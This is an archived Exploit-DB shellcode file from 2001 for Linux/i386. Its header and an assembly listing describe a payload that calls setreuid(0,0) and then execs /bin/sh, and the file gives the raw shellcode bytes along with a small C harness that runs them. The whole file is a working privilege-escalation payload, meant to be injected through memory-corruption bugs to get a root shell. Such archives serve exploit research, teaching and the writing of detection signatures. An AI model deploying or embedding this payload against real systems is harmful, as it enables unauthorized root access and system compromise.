exploit-db-mirror/platforms/lin_x86/shellcode/13458.c

/*
 * $Id: execve-setreuid.c,v 1.1 2001/05/02 18:10:52 raptor Exp $
 *
 * execve-setreuid.c v1.0 - shellcode for Linux/i386
 * Copyright (c) 2001 Raptor <raptor@0xdeadbeef.eu.org>
 *
 * This shellcode does an execve of /bin/sh
 * after a setreuid(0, 0), then exit()s.
 *
 */
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 * ASM Code                                              *
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 * ; setreuid(0, 0)
 * xorl %eax,%eax
 * xorl %ebx,%ebx
 * xorl %ecx,%ecx
 * movb $70,%al
 * int $0x80
 *
 * ; execve(foo[0], foo, 0);
 * jmp 0x1d
 * popl %esi
 * movb %eax,0x7(%esi)
 * movl %eax,0xc(%esi)
 * movl %esi,0x8(%esi)
 * movl %esi,%ebx
 * leal 0x8(%esi),%ecx
 * leal 0xc(%esi),%edx
 * movb $11,%al
 * int $0x80
 *
 * ; exit(0)
 * xorl %eax,%eax
 * xorl %ebx,%ebx
 * incl %eax
 * int $0x80
 *
 * call -0x22
 * .ascii "/bin/sh"
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

char code[] =
  "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
  "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
  "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
  "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

main()
{
  int (*funct)();
  funct = (int (*)()) code;
  (int)(*funct)();
}


// milw0rm.com [2001-05-07]